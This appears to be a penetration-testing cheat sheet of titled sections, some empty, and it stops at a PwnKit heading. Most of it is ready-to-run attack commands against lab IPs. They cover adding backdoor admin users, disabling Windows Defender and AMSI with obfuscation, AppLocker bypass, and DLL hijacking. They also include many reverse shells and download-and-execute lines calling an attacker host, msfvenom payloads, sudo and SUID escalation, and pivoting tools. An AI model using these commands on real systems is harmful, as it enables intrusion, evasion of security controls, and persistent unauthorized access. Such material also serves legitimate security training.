# C:\Windows\Tracing\
# --- Persistence: add admin user and grant access ---
net user hacker P@ssw0rd /add
net localgroup Administrators hacker /add
net localgroup "remote desktop users" hacker /add
net localgroup "Remote Management Users" hacker /add
|
|
Windows-Persistence
|
Windows-Kernel-Exploit
Shell
-
# ============================================================
# ENUMERATION — Gather system information
# ============================================================
# Full system information
systeminfo
# Quick summary of OS version and architecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# Check installed hotfixes/patches
wmic qfe list brief
# Save systeminfo output for offline analysis
systeminfo > sysinfo.txt
# ============================================================
# AUTOMATED EXPLOIT SUGGESTION
# ============================================================
# Windows Exploit Suggester - Next Generation (on attacker machine)
# https://github.com/bitsadmin/wesng
python3 wes.py sysinfo.txt
# Or use Watson (run on target, .NET based)
# https://github.com/rasta-mouse/Watson
Watson.exe
# ============================================================
# COMMON KERNEL EXPLOITS
# ============================================================
# --- EternalBlue (MS17-010) — Windows 7 / Server 2008 R2 ---
# NOTE: Popular exploits often only work for x64 (64-bit)
# For 32-bit (x86) targets, use DoublePulsar + EternalBlue combo
# https://github.com/worawit/MS17-010
python3 eternalblue_exploit.py 10.10.10.27 shellcode_x64.bin
# --- PrintNightmare (CVE-2021-1675 / CVE-2021-34527) ---
# Works on many unpatched Windows versions
# https://github.com/calebstewart/CVE-2021-1675
# PowerShell: Import-Module .\CVE-2021-1675.ps1
# Invoke-Nightmare -NewUser "hacker" -NewPassword "P@ssw0rd"
# --- Hot Potato / Rotten Potato / Juicy Potato ---
# Use JuicyPotato for modern Windows (requires SeImpersonatePrivilege)
# https://github.com/ohpe/juicy-potato
JuicyPotato.exe -l 1337 -p C:\Temp\rev.exe -t *
# --- NOTE: AV evasion ---
# If antivirus is blocking exploits, consider using a crypter
# to pack the exploit binary before transferring to target
# Check softpedia.com or exploit-db.com for CVE details
|
Windows-Defender-Evasion
-
# Check Windows Defender status
Get-MpComputerStatus
Get-MpPreference | select -ExpandProperty ExclusionPath
# Disable real-time protection (requires admin)
Set-MpPreference -DisableRealtimeMonitoring $true
# Add exclusion paths (requires admin)
Add-MpExclusion -Path "C:\Temp"
Add-MpExclusion -Path "C:\Users\Public"
# Add exclusion for specific process
Add-MpExclusion -Process "mimikatz.exe"
# Disable via registry (requires admin + may need reboot)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
# Disable via sc (requires admin)
sc stop WinDefend
sc config WinDefend start= disabled
# If can't disable, use obfuscation
# Invoke-Obfuscation for PowerShell scripts
# Use donut/ScareCrow for shellcode loaders
# Use crypter tools for PE files
# Check if detected before running
# Upload to antiscan.me (not VirusTotal — VT shares with vendors)
|
Windows-DLL-Hijack
Shell
-
# ============================================================
# ENUMERATION — Find DLL hijack opportunities with Process Monitor
# ============================================================
# Use Process Monitor (Procmon.exe) from Sysinternals:
# 1. Add filter: Result -> is -> NAME NOT FOUND
# 2. Add filter: Path -> ends with -> .dll
# 3. Run the target service/application
# 4. Look for DLL loads from writable directories
# 5. Note the exact DLL name and the process loading it
# DLL search order (Windows default):
# 1. Application directory (where the .exe lives)
# 2. C:\Windows\System32
# 3. C:\Windows\System
# 4. C:\Windows
# 5. Current working directory
# 6. Directories in PATH environment variable
# Check which directories in PATH are writable
for %A in ("%path:;=";"%") do ( icacls "%~A" 2>nul | findstr /i "(F) (M) (W)" && echo WRITABLE: %~A )
# ============================================================
# EXPLOIT — Generate and place malicious DLL
# ============================================================
# Generate a malicious DLL with msfvenom (on attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.21 LPORT=4444 -f dll -o hijack.dll
# For 32-bit targets
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.21 LPORT=4444 -f dll -o hijack.dll
# Transfer the DLL to the target and rename to the missing DLL name
copy hijack.dll "C:\Program Files\Vulnerable App\missing.dll"
# Start a listener on the attacker machine
nc -lvnp 4444
# Restart the vulnerable service to trigger DLL load
net stop VulnService
net start VulnService
# If you can't restart the service, reboot the machine
shutdown /r /t 0
|
Windows-AppLocker-Bypass
-
# Check AppLocker policy
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# Common writable bypass directories
C:\Windows\Tasks\
C:\Windows\Temp\
C:\Windows\tracing\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\FxsTmp\
C:\Windows\System32\com\dmp\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\spool\PRINTERS\
C:\Windows\System32\spool\SERVERS\
C:\Windows\SysWOW64\Tasks\
C:\Windows\SysWOW64\com\dmp\
# Copy and execute from bypass directory
copy C:\Temp\payload.exe C:\Windows\Tasks\payload.exe
C:\Windows\Tasks\payload.exe
# MSBuild bypass (execute C# inline)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
# InstallUtil bypass
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll
# Rundll32 bypass
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell");h.Run("powershell -ep bypass -f C:\\Windows\\Tasks\\script.ps1")
# Regsvr32 bypass (download and execute SCT)
regsvr32 /s /n /u /i:http://10.10.10.21/payload.sct scrobj.dll
|
Windows-AlwaysInstallElevated
Shell
-
# ============================================================
# ENUMERATION — Check if AlwaysInstallElevated is enabled
# ============================================================
# Both of these must return 0x1 for the exploit to work
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# ============================================================
# EXPLOIT 1: Reverse shell MSI
# ============================================================
# Generate a reverse shell MSI payload (on attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.21 LPORT=4444 -f msi -o shell.msi
# For 32-bit targets
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.21 LPORT=4444 -f msi -o shell.msi
# Transfer shell.msi to target, then install silently
msiexec /quiet /qn /i C:\Temp\shell.msi
# ============================================================
# EXPLOIT 2: Add admin user MSI
# ============================================================
# Generate an MSI that adds a new admin user (on attacker machine)
msfvenom -p windows/exec CMD='net user hacker P@ssw0rd /add && net localgroup Administrators hacker /add' -f msi -o addadmin.msi
# Transfer addadmin.msi to target, then install silently
msiexec /quiet /qn /i C:\Temp\addadmin.msi
# Verify the new admin user was created
net user hacker
net localgroup Administrators
|
Windows-AMSI-Bypass
-
# Basic AMSI bypass (PowerShell)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Obfuscated version (evades string detection)
$a=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils')
$b=$a.GetField('am'+'siInitFailed','NonPublic,Static')
$b.SetValue($null,$true)
# Matt Graeber's reflection method
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
# Bypass then run tools
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.21/PowerView.ps1')
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.21/Invoke-Mimikatz.ps1')
# For .NET AMSI bypass (C# tools like Rubeus, SharpHound)
# Patch amsi.dll AmsiScanBuffer to always return clean
# Use tools like AmsiTrigger to find flagged strings
|
|
WinRM-Exploitation
|
|
WinRM-Enumeration
|
Wildcard-Injection
-
# Find cron jobs using tar with wildcards:
cat /etc/crontab
ls -la /etc/cron.d/
# Look for: tar czf backup.tar.gz *
# Create checkpoint files in the target directory:
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
# Create reverse shell payload (shell.sh):
echo '#!/bin/bash' > shell.sh
echo 'bash -i >& /dev/tcp/10.10.10.21/4444 0>&1' >> shell.sh
chmod +x shell.sh
# Start listener and wait for cron execution:
nc -lvnp 4444
# Rsync wildcard injection:
echo "" > "-e sh shell.sh"
# Verify exploit files were created:
ls -la
# Should see: --checkpoint=1, --checkpoint-action=exec=sh shell.sh, shell.sh
|
WhatWeb-Recon
-
# Quick fingerprint
whatweb http://10.10.10.27
# Aggressive mode (more requests, more accurate)
whatweb -a 3 http://10.10.10.27
# Next steps based on results:
# Apache → gobuster -x php,txt,bak
# IIS → gobuster -x asp,aspx,config
# nginx → check off-by-slash: curl http://target/static../etc/passwd
# Tomcat → check /manager/html, default creds tomcat:tomcat
# WordPress → wpscan --url http://target --enumerate ap,at,u
|
|
VNC-Exploitation
|
VNC-Enumeration
No Creds
-
# Nmap VNC version and authentication info
nmap -sV -p 5900-5910 --script vnc-info 10.10.10.27
# Nmap VNC brute-force with default passwords
nmap -p 5900 --script vnc-brute 10.10.10.27
# Run all VNC NSE scripts (info, brute, title)
nmap -p 5900-5910 --script "vnc-*" 10.10.10.27
|
|
Unconstrained-Delegation
|
Token-Impersonation
Shell
-
# Check current privileges
whoami /priv
# Look for: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege
# PrintSpoofer — SeImpersonate to SYSTEM
.\PrintSpoofer.exe -i -c cmd
# GodPotato — SeImpersonate to SYSTEM
.\GodPotato.exe -cmd "cmd /c whoami"
# JuicyPotatoNG — SeImpersonate to SYSTEM
.\JuicyPotatoNG.exe -t * -p cmd.exe -a "/c whoami"
# SweetPotato — SeImpersonate to SYSTEM
.\SweetPotato.exe -p cmd.exe -a "/c whoami"
|
|
Ticket-Forgery
|
|
Shell-Stabilization
|
|
Shadow-Credentials
|
SSH-Exploitation
Credentials
-
# Standard SSH login
ssh sec_user@10.10.10.27
# Local port forwarding — access internal service on target's localhost
# Useful when web services only listen on 127.0.0.1 on the target
ssh -L 8443:127.0.0.1:8443 sec_user@10.10.10.27
# Then browse to https://127.0.0.1:8443 locally
# NOTE: If you can't login to a web service with creds, try port forwarding
# — the app may check if the request comes from localhost
# Dynamic SOCKS proxy — use with proxychains or Burp
ssh -D 9090 sec_user@10.10.10.27
# Configure proxychains or Burp to use SOCKS5 at 127.0.0.1:9090
# WARNING: Your source IP will appear as the target's IP when using the proxy
# Reverse SSH tunnel — expose attacker port through target
ssh -R 9000:localhost:22 sec_user@10.10.10.27
# From the target, you can now reach attacker's SSH on port 9000
|
SSH-Enumeration
No Creds
-
# Nmap service/version detection on SSH
nmap -sCV -p 22 10.10.10.27
# Banner grab with netcat — reveals SSH version and OS hints
nc -nv 10.10.10.27 22
# Verbose SSH connection attempt — shows version negotiation details
ssh -v sec_user@10.10.10.27 2>&1 | head -20
# Enumerate supported authentication methods
nmap --script ssh-auth-methods -p 22 10.10.10.27
# Enumerate supported key exchange, encryption, and MAC algorithms
nmap --script ssh2-enum-algos -p 22 10.10.10.27
|
SNMP-Enumeration
No Creds
-
# Nmap SNMP scripts — brute community strings, info, processes, Windows users
nmap -sU -p 161 --script snmp-brute,snmp-info,snmp-processes,snmp-win32-users 10.10.10.27
# SNMP walk with v1
snmpwalk -v 1 -c public 10.10.10.27
# SNMP walk with v2c
snmpwalk -v 2c -c public 10.10.10.27
# Bulk walk (faster, v2c only)
snmpbulkwalk -v 2c -c public 10.10.10.27
# --- Specific OID queries ---
# Enumerate Windows users
snmpwalk -v 2c -c public 10.10.10.27 1.3.6.1.4.1.77.1.2.25
# Enumerate running processes
snmpwalk -v 2c -c public 10.10.10.27 1.3.6.1.2.1.25.4.2.1.2
# Enumerate installed software
snmpwalk -v 2c -c public 10.10.10.27 1.3.6.1.2.1.25.6.3.1.2
# Enumerate TCP listening ports
snmpwalk -v 2c -c public 10.10.10.27 1.3.6.1.2.1.6.13.1.3
|
SMTP-Enumeration
No Creds
-
# Nmap SMTP scripts — commands, user enum, NTLM info
nmap -p 25 --script smtp-commands,smtp-enum-users,smtp-ntlm-info 10.10.10.27
# Automated user enumeration with smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t 10.10.10.27
# --- Manual enumeration via telnet ---
telnet 10.10.10.27 25
# Verify if a user exists
VRFY sec_user
# Expand a mailing list / alias
EXPN admin
# --- Test for open relay ---
MAIL FROM:<attacker@senshu.local>
RCPT TO:<victim@external.com>
DATA
Subject: Relay Test
Test message
.
QUIT
|
SMB-Exploitation
Credentials
-
# PsExec — interactive SYSTEM shell via SMB
impacket-psexec senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# SmbExec — semi-interactive shell via SMB
impacket-smbexec senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# WmiExec — shell via WMI (stealthier, no service install)
impacket-wmiexec senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
# AtExec — command execution via scheduled task
impacket-atexec senshu.local/sec_user:'P@ssw0rd'@10.10.10.27 'whoami'
# NetExec — quick command execution check
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' -x "whoami"
# Upload webshell via SMB
smbclient //10.10.10.27/wwwroot -U 'senshu.local\sec_user%P@ssw0rd'
smb: \> put shell.aspx
|
SMB-Enumeration
No Creds
-
nxc smb 10.10.10.27
nxc smb 10.10.10.27 -u '' -p '' --shares
smbclient -L //10.10.10.27 -N
smbmap -H 10.10.10.27
enum4linux-ng -A 10.10.10.27
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery 10.10.10.27
rpcclient -U "" -N 10.10.10.27 -c "enumdomusers"
rpcclient -U "" -N 10.10.10.27 -c "enumdomgroups"
nxc smb 10.10.10.27 -u '' -p '' --rid-brute
|
Reverse-Shells
-
# Listener
nc -lvnp 4444
rlwrap nc -lvnp 4444
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST 10.10.10.21; set LPORT 4444; run"
# Bash
bash -i >& /dev/tcp/10.10.10.21/4444 0>&1
# Python3
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.10.21",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
# PHP
php -r '$sock=fsockopen("10.10.10.21",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.21',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Perl
perl -e 'use Socket;$i="10.10.10.21";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.21",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
# Netcat
nc -e /bin/bash 10.10.10.21 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.21 4444 >/tmp/f
# Zsh (macOS)
zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.21 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
# Windows
nc.exe 10.10.10.21 4444 -e cmd.exe
# Socat
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.21:4444
|
|
Redis-Exploitation
|
Redis-Enumeration
No Creds
-
# Connect to Redis (no auth)
redis-cli -h 10.10.10.27
# Server information (version, OS, architecture)
127.0.0.1:6379> INFO server
# List databases and key counts
127.0.0.1:6379> INFO keyspace
# List all keys (select database with SELECT 0, SELECT 1, etc.)
127.0.0.1:6379> SELECT 0
127.0.0.1:6379> KEYS '*'
# Get value of a specific key
127.0.0.1:6379> GET keyname
# Scan for keys matching a pattern (non-blocking alternative to KEYS)
redis-cli -h 10.10.10.27 --scan --pattern '*'
# Check working directory and dump file (useful for exploitation)
127.0.0.1:6379> CONFIG GET dir
127.0.0.1:6379> CONFIG GET dbfilename
# List connected clients
127.0.0.1:6379> CLIENT LIST
# Nmap Redis info script
nmap -p 6379 --script redis-info 10.10.10.27
|
RPC-Enumeration
No Creds
-
# Null session — open interactive rpcclient (anonymous/no password)
rpcclient -U "" -N 10.10.10.27
# Inside rpcclient shell:
rpcclient $> srvinfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querydispinfo
rpcclient $> getdompwinfo
rpcclient $> enumprinters
# Nmap RPC scripts
nmap -p 135 --script rpc-grind,rpcinfo 10.10.10.27
Credentials
-
# Authenticated rpcclient session
rpcclient 10.10.10.27 -U 'sec_user%P@ssw0rd'
# Enumerate domain users and groups
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
# Query specific user by RID (0x1f4 = Administrator, RID 500)
rpcclient $> queryuser 0x1f4
# Query specific group by RID (0x200 = Domain Users)
rpcclient $> querygroup 0x200
# Resolve username to SID
rpcclient $> lookupnames administrator
|
RDP-Exploitation
Credentials
-
# xfreerdp with clipboard and shared drive
xfreerdp /u:sec_user /p:'P@ssw0rd' /v:10.10.10.27 /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp
# xfreerdp3 with RDP security (bypass NLA)
xfreerdp3 /v:10.10.10.27 /u:sec_user /p:'P@ssw0rd' /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp /sec:rdp
|
RDP-Enumeration
No Creds
-
# Nmap RDP scripts — encryption level, NTLM info (hostname, domain, OS)
nmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info 10.10.10.27
# NetExec — check if RDP is open
nxc rdp 10.10.10.27
|
Python-Library-Hijack
-
# Find Python scripts run as root (cron, sudo):
sudo -l
cat /etc/crontab
ls -la /etc/cron.d/
grep -r "python" /etc/cron* 2>/dev/null
# Check the Python module search path:
python3 -c "import sys; print('\n'.join(sys.path))"
# Check write permissions on module directories:
python3 -c "import sys; print('\n'.join(sys.path))" | xargs -I{} ls -ld {} 2>/dev/null
# Identify which modules the target script imports:
cat /path/to/target_script.py | grep import
# Create malicious module (e.g., if script imports "library"):
cat << 'EOF' > /writable/path/library.py
import os
os.system("bash -i >& /dev/tcp/10.10.10.21/4444 0>&1")
EOF
# Alternative — pip install to writable path:
pip install malicious_package --target /writable/path/
# Wait for cron or trigger sudo execution:
# If via sudo:
sudo /usr/bin/python3 /path/to/target_script.py
# If via cron, start listener and wait:
nc -lvnp 4444
|
|
PrintNightmare
|
|
PostgreSQL-Exploitation
|
|
PostgreSQL-Enumeration
|
Pivoting-Tunneling
-
# --- Chisel — Reverse SOCKS Proxy ---
chisel server -p 8000 --reverse
./chisel client 10.10.10.21:8000 R:socks
chisel.exe client 10.10.10.21:8000 R:socks
# Chisel single port forward
./chisel client 10.10.10.21:8000 R:3306:127.0.0.1:3306
# Chisel forward to internal host
./chisel client 10.10.10.21:8000 R:8080:172.16.0.10:80
# --- Ligolo-ng — Full Tunnel ---
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
./agent -connect 10.10.10.21:11601 -ignore-cert
agent.exe -connect 10.10.10.21:11601 -ignore-cert
# In proxy console:
>> session
>> start
sudo ip route add 172.16.0.0/24 dev ligolo
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# --- SSH Tunneling ---
# Local port forward (add -N -f to background)
ssh -L 8080:127.0.0.1:80 sec_user@10.10.10.27
# Dynamic SOCKS proxy
ssh -D 1080 -N -f sec_user@10.10.10.27
# Remote port forward
ssh -R 4444:localhost:4444 sec_user@10.10.10.27
# --- Proxychains (needed for Chisel SOCKS + SSH Dynamic) ---
# Add to /etc/proxychains4.conf:
socks5 127.0.0.1 1080
# Ligolo-ng does NOT need proxychains — uses real tun interface
proxychains4 nmap -sT -Pn -p 22,80,445,3389 172.16.0.10
proxychains4 nxc smb 172.16.0.0/24
proxychains4 evil-winrm -i 172.16.0.10 -u sec_user -p 'P@ssw0rd'
# --- sshuttle (VPN over SSH) ---
sshuttle -r sec_user@10.10.10.27 172.16.0.0/24
|
|
Password-Spraying
|
|
Password-Cracking
|
|
Pass-the-Ticket
|
|
Pass-the-Hash
|
Nmap-Scanning
-
# Service version + default scripts:
nmap -sCV 10.10.10.27
# Targeted ports:
nmap -sCV -p 21,22,80,443,445,3389 10.10.10.27
# All ports fast, then targeted:
nmap -p- --min-rate 5000 -T4 10.10.10.27
nmap -sCV -p <open_ports> 10.10.10.27
# UDP top 20:
sudo nmap -sU --top-ports 20 10.10.10.27
# Vulnerability scan:
nmap --script vuln 10.10.10.27
# EternalBlue check:
nmap --script smb-vuln-ms17-010 -p 445 10.10.10.27
# Save all formats:
nmap -sCV 10.10.10.27 -oA scan
|
Nikto-Scanning
-
# Basic scan
nikto -h http://10.10.10.27
# Multiple ports
nikto -h 10.10.10.27 -p 80,443,8080,8443
# Save report
nikto -h http://10.10.10.27 -Format htm -o nikto_report.html
# Tuning (1=Files 2=Misconfig 3=Info 4=XSS 5=Remote 6=DoS 7=Shell 8=CMDi 9=SQLi)
nikto -h http://10.10.10.27 -Tuning 1234
# Authenticated scan
nikto -h http://10.10.10.27 -id sec_user:P@ssw0rd
|
|
NTLM-Relay-Poisoning
|
|
NFS-Exploitation
|
NFS-Enumeration
No Creds
-
showmount -e 10.10.10.27
# Note: sometimes requires sudo
sudo showmount -e 10.10.10.27
nmap -p 111,2049 --script nfs-ls,nfs-showmount,nfs-statfs 10.10.10.27
mkdir /tmp/nfs && sudo mount -t nfs 10.10.10.27:/share /tmp/nfs
|
|
MySQL-Exploitation
|
MySQL-Enumeration
No Creds
-
# Nmap scripts — version info, user enumeration, empty password check
nmap -p 3306 --script mysql-info,mysql-enum,mysql-empty-password 10.10.10.27
Credentials
-
# Connect to MySQL with credentials
mysql -h 10.10.10.27 -u sec_user -p
# List all databases
mysql> SHOW DATABASES;
# Select a database
mysql> USE dbname;
# List all tables in current database
mysql> SHOW TABLES;
# Show table structure/columns
mysql> DESCRIBE tablename;
# Dump all rows from a table
mysql> SELECT * FROM users;
# Extract all MySQL user accounts and password hashes
mysql> SELECT user, host, authentication_string FROM mysql.user;
|
|
Msfvenom-Payloads
|
|
Metasploit-Common
|
MSSQL-Linked-Servers
-
# Enumerate linked servers:
SELECT * FROM sys.servers;
# List linked servers (alternative):
EXEC sp_linkedservers;
# Execute command on a linked server:
EXEC ('whoami') AT [LINKED_SERVER];
# Double hop — execute through nested linked servers:
EXEC ('EXEC (''whoami'') AT [SECOND_LINK]') AT [FIRST_LINK];
# Check current user context:
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
# Check who can be impersonated:
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
# Impersonate sa login:
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
# Enable and use xp_cmdshell after impersonation:
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
|
MSSQL-Exploitation
Credentials
-
# Connect with mssqlclient
mssqlclient.py 'sec_user:P@ssw0rd@10.10.10.27'
# Enable xp_cmdshell (impacket shortcut)
SQL> enable_xp_cmdshell
# Execute OS commands
SQL> xp_cmdshell 'whoami'
SQL> xp_cmdshell 'type C:\Users\Administrator\Desktop\flag.txt'
# --- Manual xp_cmdshell enable (if shortcut fails) ---
# Enable advanced options first
SQL> sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
# Enable xp_cmdshell
SQL> sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
# Execute via EXEC syntax
SQL> EXEC master..xp_cmdshell 'whoami';
# --- NetExec ---
# Execute commands via MSSQL
nxc mssql 10.10.10.27 -u sec_user -p 'P@ssw0rd' -x "whoami"
# Authenticate with local account (not domain)
nxc mssql 10.10.10.27 -u sec_user -p 'P@ssw0rd' --local-auth
|
|
MSSQL-Enumeration
|
Linux-Writable-Services
-
# Find writable systemd service files
find /etc/systemd/system/ -writable 2>/dev/null
find /lib/systemd/system/ -writable 2>/dev/null
find /run/systemd/system/ -writable 2>/dev/null
# Find writable init scripts
find /etc/init.d/ -writable 2>/dev/null
# Check service file permissions
ls -la /etc/systemd/system/
ls -la /lib/systemd/system/
# Modify writable service to execute reverse shell
# Edit the ExecStart line:
# ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.21/4444 0>&1'
# Or add to existing service
# ExecStartPre=/tmp/shell.sh
# Reload and restart
systemctl daemon-reload
systemctl restart vulnerable-service
# If can't restart, wait for reboot or check if timer triggers it
systemctl list-timers
|
Linux-SUID-Sudo
Shell
-
# ============================================================
# ENUMERATION — Sudo permissions
# ============================================================
# Check sudo permissions for current user
sudo -l
# Check sudo version (older versions have CVEs)
sudo --version
# ============================================================
# ENUMERATION — SUID and SGID binaries
# ============================================================
# Find all SUID binaries
find / -perm -4000 2>/dev/null
# Find SUID binaries (filter out common false positives)
find / -perm -4000 2>/dev/null | grep -vE "snap|lib|dbus|Xorg"
# Find all SGID binaries
find / -perm -2000 2>/dev/null
# Check GTFOBins for each binary found:
# https://gtfobins.github.io/
# ============================================================
# SUDO EXPLOITS — Common sudo-allowed binaries
# ============================================================
# sudo vim — spawn shell
sudo vim -c ':!/bin/bash'
# sudo find — command execution
sudo find / -exec /bin/bash \; -quit
# sudo python3
sudo python3 -c 'import os; os.system("/bin/bash")'
# sudo perl
sudo perl -e 'exec "/bin/bash";'
# sudo env
sudo env /bin/bash
# sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'
# sudo less/more — type !/bin/bash in the pager
sudo less /etc/shadow
# sudo nmap (older versions with interactive mode)
sudo nmap --interactive
# then type: !sh
# ============================================================
# SUDO — LD_PRELOAD exploitation
# ============================================================
# If sudo -l shows: env_keep += LD_PRELOAD
# Compile a shared library that spawns a shell:
# #include <stdio.h>
# #include <stdlib.h>
# void _init() { unsetenv("LD_PRELOAD"); setuid(0); system("/bin/bash -p"); }
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so <any_allowed_command>
# ============================================================
# SUID EXPLOITS — Common SUID binaries
# ============================================================
# SUID bash/sh — drop into root shell
/bin/bash -p
# SUID python3
python3 -c 'import os; os.execvp("/bin/bash", ["bash", "-p"])'
# SUID find
find . -exec /bin/bash -p \; -quit
# SUID cp — overwrite /etc/passwd
openssl passwd -1 hacker
# Add line: hacker:<hash>:0:0:root:/root:/bin/bash to /tmp/passwd
cp /tmp/passwd /etc/passwd
# SUID nmap (older versions)
nmap --interactive
# then type: !sh
# ============================================================
# SUDO VERSION CVEs
# ============================================================
# CVE-2021-3156 (Baron Samedit) — sudo 1.8.2 to 1.8.31p2, 1.9.0 to 1.9.5p1
# https://github.com/blasty/CVE-2021-3156
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# CVE-2019-14287 — sudo < 1.8.28 (run as any user bypass)
# If sudo -l shows: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
|
|
Linux-Post-Exploitation
|
|
Linux-Persistence
|
Linux-NFS-Abuse
Shell
-
# ============================================================
# ENUMERATION — Discover NFS shares
# ============================================================
# Enumerate NFS shares from attacker (may need sudo)
showmount -e 10.10.10.27
sudo showmount -e 10.10.10.27
# On the target, check exports config for no_root_squash
cat /etc/exports
# ============================================================
# MOUNT — Mount the NFS share on attacker machine
# ============================================================
mkdir /tmp/nfs
sudo mount -t nfs 10.10.10.27:/share /tmp/nfs
# Verify the mount
df -h /tmp/nfs
ls -la /tmp/nfs
# ============================================================
# EXPLOIT 1: SUID bash (requires no_root_squash)
# ============================================================
# On attacker as root — copy bash and set SUID
sudo cp /bin/bash /tmp/nfs/bash
sudo chmod +s /tmp/nfs/bash
sudo chmod +x /tmp/nfs/bash
# On target as low-priv user — execute SUID bash
/share/bash -p
# ============================================================
# EXPLOIT 2: SUID C binary (requires no_root_squash)
# ============================================================
# Compile on attacker:
# int main() { setuid(0); setgid(0); system("/bin/bash -p"); }
sudo gcc -o /tmp/nfs/rootshell /tmp/rootshell.c
sudo chmod +s /tmp/nfs/rootshell
# On target:
/share/rootshell
# ============================================================
# EXPLOIT 3: UID matching (when root_squash is ON)
# ============================================================
# Check file ownership on the NFS share
ls -lan /tmp/nfs
# Create a local user with the matching UID
sudo useradd -u 1001 tempuser
su - tempuser
# Now you have read/write access to files owned by UID 1001
# Modify scripts, plant SSH keys, etc.
# ============================================================
# CLEANUP — Unmount when done
# ============================================================
sudo umount /tmp/nfs
|
Linux-Kernel-Exploit
Shell
-
# ============================================================
# ENUMERATION — Kernel and OS version
# ============================================================
# Get kernel version (full and short)
uname -a
uname -r
# Get OS release information
cat /etc/*-release
cat /etc/os-release
cat /etc/issue
# Check architecture
arch
dpkg --print-architecture 2>/dev/null
# ============================================================
# AUTOMATED EXPLOIT SUGGESTION
# ============================================================
# linux-exploit-suggester (run on target)
# https://github.com/The-Z-Labs/linux-exploit-suggester
./linux-exploit-suggester.sh
# Or searchsploit (on attacker)
searchsploit linux kernel $(uname -r | cut -d'-' -f1)
# ============================================================
# PwnKit (CVE-2021-4034)
# ============================================================
